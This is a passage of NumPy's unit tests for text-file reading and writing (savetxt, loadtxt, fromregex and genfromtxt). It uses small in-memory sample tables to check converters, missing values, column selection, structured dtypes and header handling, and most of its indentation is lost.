        # Specify delimiter, should be overridden
c = StringIO()
np.savetxt(c, a, fmt='%02d : %3.1f', delimiter=',')
c.seek(0)
lines = c.readlines()
assert_equal(lines, asbytes_nested(['01 : 2.0\n', '03 : 4.0\n']))
def test_file_roundtrip(self):
f, name = mkstemp()
os.close(f)
try:
a = np.array([(1, 2), (3, 4)])
np.savetxt(name, a)
b = np.loadtxt(name)
assert_array_equal(a, b)
finally:
os.unlink(name)
class TestLoadTxt(TestCase):
def test_record(self):
c = StringIO()
c.write(asbytes('1 2\n3 4'))
c.seek(0)
x = np.loadtxt(c, dtype=[('x', np.int32), ('y', np.int32)])
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_array_equal(x, a)
d = StringIO()
d.write(asbytes('M 64.0 75.0\nF 25.0 60.0'))
d.seek(0)
mydescriptor = {'names': ('gender', 'age', 'weight'),
'formats': ('S1',
'i4', 'f4')}
b = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=mydescriptor)
y = np.loadtxt(d, dtype=mydescriptor)
assert_array_equal(y, b)
def test_array(self):
c = StringIO()
c.write(asbytes('1 2\n3 4'))
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([[1, 2], [3, 4]], int)
assert_array_equal(x, a)
c.seek(0)
x = np.loadtxt(c, dtype=float)
a = np.array([[1, 2], [3, 4]], float)
assert_array_equal(x, a)
def test_1D(self):
c = StringIO()
c.write(asbytes('1\n2\n3\n4\n'))
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
c = StringIO()
c.write(asbytes('1,2,3,4\n'))
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',')
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
def test_missing(self):
c = StringIO()
c.write(asbytes('1,2,3,,5\n'))
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
converters={3:lambda s: int(s or - 999)})
a = np.array([1, 2, 3, -999, 5], int)
assert_array_equal(x, a)
def test_converters_with_usecols(self):
c = StringIO()
c.write(asbytes('1,2,3,,5\n6,7,8,9,10\n'))
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
converters={3:lambda s: int(s or - 999)}, \
usecols=(1, 3,))
a = np.array([[2, -999], [7, 9]], int)
assert_array_equal(x, a)
def test_comments(self):
c = StringIO()
c.write(asbytes('# comment\n1,2,3,5\n'))
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
comments='#')
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_skiprows(self):
c = StringIO()
c.write(asbytes('comment\n1,2,3,5\n'))
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
c = StringIO()
c.write(asbytes('# comment\n1,2,3,5\n'))
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_usecols(self):
a = np.array([[1, 2], [3, 4]], float)
c = StringIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1,))
assert_array_equal(x, a[:, 1])
a = np.array([[1, 2, 3], [3, 4, 5]], float)
c = StringIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1, 2))
assert_array_equal(x, a[:, 1:])
# Testing with arrays instead of tuples.
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=np.array([1, 2]))
assert_array_equal(x, a[:, 1:])
# Checking with dtypes defined converters.
data = '''JOE 70.1 25.3
BOB 60.5 27.9
'''
c = StringIO(data)
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
arr = np.loadtxt(c, usecols=(0, 2), dtype=zip(names, dtypes))
assert_equal(arr['stid'], asbytes_nested(["JOE", "BOB"]))
assert_equal(arr['temp'], [25.3, 27.9])
def test_fancy_dtype(self):
c = StringIO()
c.write(asbytes('1,2,3.0\n4,5,6.0\n'))
c.seek(0)
dt = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
x = np.loadtxt(c, dtype=dt, delimiter=',')
a = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dt)
assert_array_equal(x, a)
def test_shaped_dtype(self):
c = StringIO("aaaa 1.0 8.0 1 2 3 4 5 6")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 3))])
x = np.loadtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
dtype=dt)
assert_array_equal(x, a)
def test_3d_shaped_dtype(self):
c = StringIO("aaaa 1.0 8.0 1 2 3 4 5 6 7 8 9 10 11 12")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 2, 3))])
x = np.loadtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[[1, 2, 3], [4, 5, 6]],[[7, 8, 9], [10, 11, 12]]])],
dtype=dt)
assert_array_equal(x, a)
def test_empty_file(self):
c = StringIO()
assert_raises(IOError, np.loadtxt, c)
def test_unused_converter(self):
c = StringIO()
c.writelines([asbytes('1 21\n'), asbytes('3 42\n')])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_array_equal(data, [21, 42])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_array_equal(data, [33, 66])
def test_dtype_with_object(self):
"Test using an explicit dtype with an object"
from datetime import date
import time
data = """
1; 2001-01-01
2; 2002-01-31
"""
ndtype = [('idx', int), ('code', np.object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.loadtxt(StringIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array([(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
dtype=ndtype)
assert_equal(test, control)
def test_universal_newline(self):
f, name = mkstemp()
os.write(f, asbytes('1 21\r3 42\r'))
os.close(f)
try:
data = np.loadtxt(name)
assert_array_equal(data, [[1, 21], [3, 42]])
finally:
os.unlink(name)
class Testfromregex(TestCase):
def test_record(self):
c = StringIO()
c.write(asbytes('1.312 foo\n1.534 bar\n4.444 qux'))
c.seek(0)
dt = [('num', np.float64), ('val', 'S3')]
x = np.fromregex(c, r"([0-9.]+)\s+(...)", dt)
a = np.array([(1.312, 'foo'), (1.534, 'bar'), (4.444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_2(self):
c = StringIO()
c.write(asbytes('1312 foo\n1534 bar\n4444 qux'))
c.seek(0)
dt = [('num', np.int32), ('val', 'S3')]
x = np.fromregex(c, r"(\d+)\s+(...)", dt)
a = np.array([(1312, 'foo'), (1534, 'bar'), (4444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_3(self):
c = StringIO()
c.write(asbytes('1312 foo\n1534 bar\n4444 qux'))
c.seek(0)
dt = [('num', np.float64)]
x = np.fromregex(c, r"(\d+)\s+...", dt)
a = np.array([(1312,), (1534,), (4444,)], dtype=dt)
assert_array_equal(x, a)
#####--------------------------------------------------------------------------
class TestFromTxt(TestCase):
#
def test_record(self):
"Test w/ explicit dtype"
data = StringIO(asbytes('1 2\n3 4'))
# data.seek(0)
test = np.ndfromtxt(data, dtype=[('x', np.int32), ('y', np.int32)])
control = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_equal(test, control)
#
data = StringIO('M 64.0 75.0\nF 25.0 60.0')
# data.seek(0)
descriptor = {'names': ('gender', 'age', 'weight'),
'formats': ('S1', 'i4', 'f4')}
control = np.array([('M', 64.0, 75.0), ('F', 25.0, 60.0)],
dtype=descriptor)
test = np.ndfromtxt(data, dtype=descriptor)
assert_equal(test, control)
    def test_array(self):
        "Test outputting a standard ndarray"
data = StringIO('1 2\n3 4')
control = np.array([[1, 2], [3, 4]], dtype=int)
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data.seek(0)
control = np.array([[1, 2], [3, 4]], dtype=float)
test = np.loadtxt(data, dtype=float)
assert_array_equal(test, control)
def test_1D(self):
"Test squeezing to 1D"
control = np.array([1, 2, 3, 4], int)
#
data = StringIO('1\n2\n3\n4\n')
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data = StringIO('1,2,3,4\n')
test = np.ndfromtxt(data, dtype=int, delimiter=asbytes(','))
assert_array_equal(test, control)
def test_comments(self):
"Test the stripping of comments"
control = np.array([1, 2, 3, 5], int)
# Comment on its own line
data = StringIO('# comment\n1,2,3,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=asbytes(','), comments=asbytes('#'))
assert_equal(test, control)
# Comment at the end of a line
data = StringIO('1,2,3,5# comment\n')
test = np.ndfromtxt(data, dtype=int, delimiter=asbytes(','), comments=asbytes('#'))
assert_equal(test, control)
def test_skiprows(self):
"Test row skipping"
control = np.array([1, 2, 3, 5], int)
kwargs = dict(dtype=int, delimiter=asbytes(','))
#
data = StringIO('comment\n1,2,3,5\n')
test = np.ndfromtxt(data, skip_header=1, **kwargs)
assert_equal(test, control)
#
data = StringIO('# comment\n1,2,3,5\n')
test = np.loadtxt(data, skiprows=1, **kwargs)
assert_equal(test, control)
def test_skip_footer(self):
data = ["# %i" % i for i in range(1, 6)]
data.append("A, B, C")
data.extend(["%i,%3.1f,%03s" % (i, i, i) for i in range(51)])
data[-1] = "99,99"
kwargs = dict(delimiter=",", names=True, skip_header=5, skip_footer=10)
test = np.genfromtxt(StringIO(asbytes("\n".join(data))), **kwargs)
ctrl = np.array([("%f" % i, "%f" % i, "%f" % i) for i in range(41)],
dtype=[(_, float) for _ in "ABC"])
assert_equal(test, ctrl)
def test_skip_footer_with_invalid(self):
import warnings
basestr = '1 1\n2 2\n3 3\n4 4\n5 \n6 \n7 \n'
warnings.filterwarnings("ignore")
# Footer too small to get rid of all invalid values
assert_raises(ValueError, np.genfromtxt,
StringIO(basestr), skip_footer=1)
# except ValueError:
# pass
a = np.genfromtxt(StringIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
a = np.genfromtxt(StringIO(basestr), skip_footer=3)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
basestr = '1 1\n2 \n3 3\n4 4\n5 \n6 6\n7 7\n'
a = np.genfromtxt(StringIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.], [6., 6.]]))
a = np.genfromtxt(StringIO(basestr), skip_footer=3, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.]]))
warnings.resetwarnings()
def test_header(self):
"Test retrieving a header"
data = StringIO('gender age weight\nM 64.0 75.0\nF 25.0 60.0')
test = np.ndfromtxt(data, dtype=None, names=True)
control = {'gender': np.array(asbytes_nested(['M', 'F'])),
'age': np.array([64.0, 25.0]),
'weight': np.array([75.0, 60.0])}
assert_equal(test['gender'], control['gender'])
assert_equal(test['age'], control['age'])
assert_equal(test['weight'], control['weight'])
def test_auto_dtype(self):
"Test the automatic definition of the output dtype"
data = StringIO('A 64 75.0 3+4j True\nBCD 25 60.0 5+6j False')
test = np.ndfromtxt(data, dtype=None)
control = [np.array(asbytes_nested(['A', 'BCD'])),
np.array([64, 25]),
np.array([75.0, 60.0]),
np.array([3 + 4j, 5 + 6j]),
np.array([True, False]), ]
assert_equal(test.dtype.names, ['f0', 'f1', 'f2', 'f3', 'f4'])
for (i, ctrl) in enumerate(control):
assert_equal(test['f%i' % i], ctrl)
def test_auto_dtype_uniform(self):
"Tests whether the output dtype can be uniformized"
data = StringIO('1 2 3 4\n5 6 7 8\n')
test = np.ndfromtxt(data, dtype=None)
control = np.array([[1, 2, 3, 4], [5, 6, 7, 8]])
assert_equal(test, control)
def test_fancy_dtype(self):
"Check that a nested dtype isn't MIA"
data = StringIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.ndfromtxt(data, dtype=fancydtype, delimiter=',')
control = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_names_overwrite(self):
"Test overwriting the names of the dtype"
descriptor = {'names': ('g', 'a', 'w'),
'formats': ('S1', 'i4', 'f4')}
data = StringIO('M 64.0 75.0\nF 25.0 60.0')
names = ('gender', 'age', 'weight')
test = np.ndfromtxt(data, dtype=descriptor, names=names)
descriptor['names'] = names
control = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=descriptor)
assert_equal(test, control)
def test_commented_header(self):
"Check that names can be retrieved even if the line is commented out."
data = StringIO("""
#gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
# The # is part of the first name and should be deleted automatically.
test = np.genfromtxt(data, names=True, dtype=None)
ctrl = np.array([('M', 21, 72.1), ('F', 35, 58.33), ('M', 33, 21.99)],
dtype=[('gender', '|S1'), ('age', int), ('weight', float)])
assert_equal(test, ctrl)
# Ditto, but we should get rid of the first element
data = StringIO("""
# gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
test = np.genfromtxt(data, names=True, dtype=None)
assert_equal(test, ctrl)
def test_autonames_and_usecols(self):
"Tests names and usecols"
data = StringIO('A B C D\n aaaa 121 45 9.1')
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'),
names=True, dtype=None)
control = np.array(('aaaa', 45, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_with_usecols(self):
"Test the combination user-defined converters and usecol"
data = StringIO('1,2,3,,5\n6,7,8,9,10\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',',
converters={3:lambda s: int(s or - 999)},
usecols=(1, 3,))
control = np.array([[2, -999], [7, 9]], int)
assert_equal(test, control)
def test_converters_with_usecols_and_names(self):
"Tests names and usecols"
data = StringIO('A B C D\n aaaa 121 45 9.1')
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'), names=True,
dtype=None, converters={'C':lambda s: 2 * int(s)})
control = np.array(('aaaa', 90, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_cornercases(self):
"Test the conversion to datetime."
converter = {'date': lambda s: strptime(s, '%Y-%m-%d %H:%M:%SZ')}
data = StringIO('2009-02-03 12:00:00Z, 72214.0')
test = np.ndfromtxt(data, delimiter=',', dtype=None,
names=['date', 'stid'], converters=converter)
        control = np.array((datetime(2009, 2, 3), 72214.),
dtype=[('date', np.object_), ('stid', float)])
assert_equal(test, control)
def test_unused_converter(self):
"Test whether unused converters are forgotten"
data = StringIO("1 21\n 3 42\n")
test = np.ndfromtxt(data, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_equal(test, [21, 42])
#
data.seek(0)
test = np.ndfromtxt(data, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_equal(test, [33, 66])
def test_invalid_converter(self):
strip_rand = lambda x : float((asbytes('r') in x.lower() and x.split()[-1]) or
(not asbytes('r') in x.lower() and x.strip() or 0.0))
strip_per = lambda x : float((asbytes('%') in x.lower() and x.split()[0]) or
(not asbytes('%') in x.lower() and x.strip() or 0.0))
s = StringIO("D01N01,10/1/2003 ,1 %,R 75,400,600\r\n" \
"L24U05,12/5/2003, 2 %,1,300, 150.5\r\n"
"D02N03,10/10/2004,R 1,,7,145.55")
kwargs = dict(converters={2 : strip_per, 3 : strip_rand}, delimiter=",",
dtype=None)
assert_raises(ConverterError, np.genfromtxt, s, **kwargs)
def test_tricky_converter_bug1666(self):
"Test some corner case"
s = StringIO('q1,2\nq3,4')
cnv = lambda s:float(s[1:])
test = np.genfromtxt(s, delimiter=',', converters={0:cnv})
control = np.array([[1., 2.], [3., 4.]])
assert_equal(test, control)
def test_dtype_with_converters(self):
dstr = "2009; 23; 46"
test = np.ndfromtxt(StringIO(dstr,),
delimiter=";", dtype=float, converters={0:bytes})
control = np.array([('2009', 23., 46)],
dtype=[('f0', '|S4'), ('f1', float), ('f2', float)])
assert_equal(test, control)
test = np.ndfromtxt(StringIO(dstr,),
delimiter=";", dtype=float, converters={0:float})
control = np.array([2009., 23., 46],)
assert_equal(test, control)
def test_dtype_with_object(self):
"Test using an explicit dtype with an object"
from datetime import date
import time
data = asbytes("""
1; 2001-01-01
2; 2002-01-31
""")
ndtype = [('idx', int), ('code', np.object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.genfromtxt(StringIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array([(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
dtype=ndtype)
assert_equal(test, control)
#
ndtype = [('nest', [('idx', int), ('code', np.object)])]
try:
test = np.genfromtxt(StringIO(data), delimiter=";",
dtype=ndtype, converters=converters)
except NotImplementedError:
pass
else:
errmsg = "Nested dtype involving objects should be supported."
raise AssertionError(errmsg)
def test_userconverters_with_explicit_dtype(self):
"Test user_converters w/ explicit (standard) dtype"
data = StringIO('skip,skip,2001-01-01,1.0,skip')
test = np.genfromtxt(data, delimiter=",", names=None, dtype=float,
usecols=(2, 3), converters={2: bytes})
control = np.array([('2001-01-01', 1.)],
dtype=[('', '|S10'), ('', float)])
assert_equal(test, control)
def test_spacedelimiter(self):
"Test space delimiter"
data = StringIO("1 2 3 4 5\n6 7 8 9 10")
test = np.ndfromtxt(data)
control = np.array([[ 1., 2., 3., 4., 5.],
[ 6., 7., 8., 9., 10.]])
assert_equal(test, control)
def test_integer_delimiter(self):
"Test using an integer for delimiter"
data = " 1 2 3\n 4 5 67\n890123 4"
test = np.genfromtxt(StringIO(data), delimiter=3)
control = np.array([[1, 2, 3], [4, 5, 67], [890, 123, 4]])
assert_equal(test, control)
def test_missing(self):
data = StringIO('1,2,3,,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', \
converters={3:lambda s: int(s or - 999)})
control = np.array([1, 2, 3, -999, 5], int)
assert_equal(test, control)
def test_missing_with_tabs(self):
"Test w/ a delimiter tab"
txt = "1\t2\t3\n\t2\t\n1\t\t3"
test = np.genfromtxt(StringIO(txt), delimiter="\t",
usemask=True,)
ctrl_d = np.array([(1, 2, 3), (np.nan, 2, np.nan), (1, np.nan, 3)],)
ctrl_m = np.array([(0, 0, 0), (1, 0, 1), (0, 1, 0)], dtype=bool)
assert_equal(test.data, ctrl_d)
assert_equal(test.mask, ctrl_m)
def test_usecols(self):
"Test the selection of columns"
# Select 1 column
control = np.array([[1, 2], [3, 4]], float)
data = StringIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1,))
assert_equal(test, control[:, 1])
#
control = np.array([[1, 2, 3], [3, 4, 5]], float)
data = StringIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1, 2))
assert_equal(test, control[:, 1:])
# Testing with arrays instead of tuples.
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=np.array([1, 2]))
assert_equal(test, control[:, 1:])
def test_usecols_as_css(self):
"Test giving usecols with a comma-separated string"
data = "1 2 3\n4 5 6"
test = np.genfromtxt(StringIO(data),
names="a, b, c", usecols="a, c")
ctrl = np.array([(1, 3), (4, 6)], dtype=[(_, float) for _ in "ac"])
assert_equal(test, ctrl)
def test_usecols_with_structured_dtype(self):
"Test usecols with an explicit structured dtype"
data = StringIO("""JOE 70.1 25.3\nBOB 60.5 27.9""")
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
test = np.ndfromtxt(data, usecols=(0, 2), dtype=list(zip(names, dtypes)))
assert_equal(test['stid'], asbytes_nested(["JOE", "BOB"]))
assert_equal(test['temp'], [25.3, 27.9])
def test_usecols_with_integer(self):
"Test usecols with an integer"
test = np.genfromtxt(StringIO("1 2 3\n4 5 6"), usecols=0)
assert_equal(test, np.array([1., 4.]))
def test_usecols_with_named_columns(self):
"Test usecols with named columns"
ctrl = np.array([(1, 3), (4, 6)], dtype=[('a', float), ('c', float)])
data = "1 2 3\n4 5 6"
kwargs = dict(names="a, b, c")
test = np.genfromtxt(StringIO(data), usecols=(0, -1), **kwargs)
assert_equal(test, ctrl)
test = np.genfromtxt(StringIO(data),
usecols=('a', 'c'), **kwargs)
assert_equal(test, ctrl)
def test_empty_file(self):
"Test that an empty file raises the proper exception"
data = StringIO()
assert_raises(IOError, np.ndfromtxt, data)
def test_fancy_dtype_alt(self):
"Check that a nested dtype isn't MIA"
data = StringIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.mafromtxt(data, dtype=fancydtype, delimiter=',')
control = ma.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_shaped_dtype(self):
c = StringIO("aaaa 1.0 8.0 1 2 3 4 5 6")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 3))])
x = np.ndfromtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
dtype=dt)
assert_array_equal(x, a)
def test_withmissing(self):
data = StringIO('A,B\n0,1\n2,N/A')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.mafromtxt(data, dtype=None, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
#
data.seek(0)
test = np.mafromtxt(data, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.float), ('B', np.float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_user_missing_values(self):
data = "A, B, C\n0, 0., 0j\n1, N/A, 1j\n-9, 2.2, N/A\n3, -99, 3j"
basekwargs = dict(dtype=None, delimiter=",", names=True,)
mdtype = [('A', int), ('B', float), ('C', complex)]
#
test = np.mafromtxt(StringIO(data), missing_values="N/A",
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (0, 0, 1), (0, 0, 0)],
dtype=mdtype)
assert_equal(test, control)
#
basekwargs['dtype'] = mdtype
test = np.mafromtxt(StringIO(data),
missing_values={0:-9, 1:-99, 2:-999j}, **basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
#
test = np.mafromtxt(StringIO(data),
missing_values={0:-9, 'B':-99, 'C':-999j},
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
def test_user_filling_values(self):
"Test with missing and filling values"
ctrl = np.array([(0, 3), (4, -999)], dtype=[('a', int), ('b', int)])
data = "N/A, 2, 3\n4, ,???"
kwargs = dict(delimiter=",",
dtype=int,
names="a,b,c",
missing_values={0:"N/A", 'b':" ", 2:"???"},
filling_values={0:0, 'b':0, 2:-999})
test = np.genfromtxt(StringIO(data), **kwargs)
ctrl = np.array([(0, 2, 3), (4, 0, -999)],
dtype=[(_, int) for _ in "abc"])
assert_equal(test, ctrl)
#
test = np.genfromtxt(StringIO(data), usecols=(0, -1), **kwargs)
ctrl = np.array([(0, 3), (4, -999)], dtype=[(_, int) for _ in "ac"])
assert_equal(test, ctrl)
def test_withmissing_float(self):
data = StringIO('A,B\n0,1.5\n2,-999.00')
test = np.mafromtxt(data, dtype=None, delimiter=',',
missing_values='-999.0', names=True,)
control = ma.array([(0, 1.5), (2, -1.)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_with_masked_column_uniform(self):
"Test masked column"
data = StringIO('1 2 3\n4 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([[1, 2, 3], [4, 5, 6]], mask=[[0, 1, 0], [0, 1, 0]])
assert_equal(test, control)
def test_with_masked_column_various(self):
"Test masked column"
data = StringIO('True 2 3\nFalse 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([(1, 2, 3), (0, 5, 6)],
mask=[(0, 1, 0), (0, 1, 0)],
dtype=[('f0', bool), ('f1', bool), ('f2', int)])
assert_equal(test, control)
def test_invalid_raise(self):
"Test invalid raise"
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = StringIO("\n".join(data))
#
kwargs = dict(delimiter=",", dtype=None, names=True)
# XXX: is there a better way to get the return value of the callable in
# assert_warns ?
ret = {}
def f(_ret={}):
_ret['mtest'] = np.ndfromtxt(mdata, invalid_raise=False, **kwargs)
assert_warns(ConversionWarning, f, _ret=ret)
mtest = ret['mtest']
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'abcde']))
#
mdata.seek(0)
assert_raises(ValueError, np.ndfromtxt, mdata,
delimiter=",", names=True)
def test_invalid_raise_with_usecols(self):
"Test invalid_raise with usecols"
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = StringIO("\n".join(data))
kwargs = dict(delimiter=",", dtype=None, names=True,
invalid_raise=False)
# XXX: is there a better way to get the return value of the callable in
# assert_warns ?
ret = {}
def f(_ret={}):
_ret['mtest'] = np.ndfromtxt(mdata, usecols=(0, 4), **kwargs)
assert_warns(ConversionWarning, f, _ret=ret)
mtest = ret['mtest']
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'ae']))
#
mdata.seek(0)
mtest = np.ndfromtxt(mdata, usecols=(0, 1), **kwargs)
assert_equal(len(mtest), 50)
control = np.ones(50, dtype=[(_, int) for _ in 'ab'])
control[[10 * _ for _ in range(5)]] = (2, 2)
assert_equal(mtest, control)
def test_inconsistent_dtype(self):
"Test inconsistent dtype"
data = ["1, 1, 1, 1, -1.1"] * 50
mdata = StringIO("\n".join(data))
converters = {4: lambda x:"(%s)" % x}
kwargs = dict(delimiter=",", converters=converters,
dtype=[(_, int) for _ in 'abcde'],)
assert_raises(ValueError, np.genfromtxt, mdata, **kwargs)
def test_default_field_format(self):
"Test default format"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(StringIO(data),
delimiter=",", dtype=None, defaultfmt="f%02i")
ctrl = np.array([(0, 1, 2.3), (4, 5, 6.7)],
dtype=[("f00", int), ("f01", int), ("f02", float)])
assert_equal(mtest, ctrl)
def test_single_dtype_wo_names(self):
"Test single dtype w/o names"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(StringIO(data),
delimiter=",", dtype=float, defaultfmt="f%02i")
ctrl = np.array([[0., 1., 2.3], [4., 5., 6.7]], dtype=float)
assert_equal(mtest, ctrl)
def test_single_dtype_w_explicit_names(self):
"Test single dtype w explicit names"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(StringIO(data),
delimiter=",", dtype=float, names="a, b, c")
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_single_dtype_w_implicit_names(self):
"Test single dtype w implicit names"
data = "a, b, c\n0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(StringIO(data),
delimiter=",", dtype=float, names=True)
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_easy_structured_dtype(self):
"Test easy structured dtype"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(StringIO(data), delimiter=",",
dtype=(int, float, float), defaultfmt="f_%02i")
ctrl = np.array([(0, 1., 2.3), (4, 5., 6.7)],
dtype=[("f_00", int), ("f_01", float), ("f_02", float)])
assert_equal(mtest, ctrl)
def test_autostrip(self):
"Test autostrip"
data = "01/01/2003 , 1.3, abcde"
kwargs = dict(delimiter=",", dtype=None)
mtest = np.ndfromtxt(StringIO(data), **kwargs)
ctrl = np.array([('01/01/2003 ', 1.3, ' abcde')],
dtype=[('f0', '|S12'), ('f1', float), ('f2', '|S8')])
assert_equal(mtest, ctrl)
mtest = np.ndfromtxt(StringIO(data), autostrip=True, **kwargs)
ctrl = np.array([('01/01/2003', 1.3, 'abcde')],
dtype=[('f0', '|S10'), ('f1', float), ('f2', '|S5')])
assert_equal(mtest, ctrl)
def test_replace_space(self):
"Test the 'replace_space' option"
txt = "A.A, B (B), C:C\n1, 2, 3.14"
# Test default: replace ' ' by '_' and delete non-alphanum chars
test = np.genfromtxt(StringIO(txt),
delimiter=",", names=True, dtype=None)
ctrl_dtype = [("AA", int), ("B_B", int), ("CC", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no replace, no delete
test = np.genfromtxt(StringIO(txt),
delimiter=",", names=True, dtype=None,
replace_space='', deletechars='')
ctrl_dtype = [("A.A", int), ("B (B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
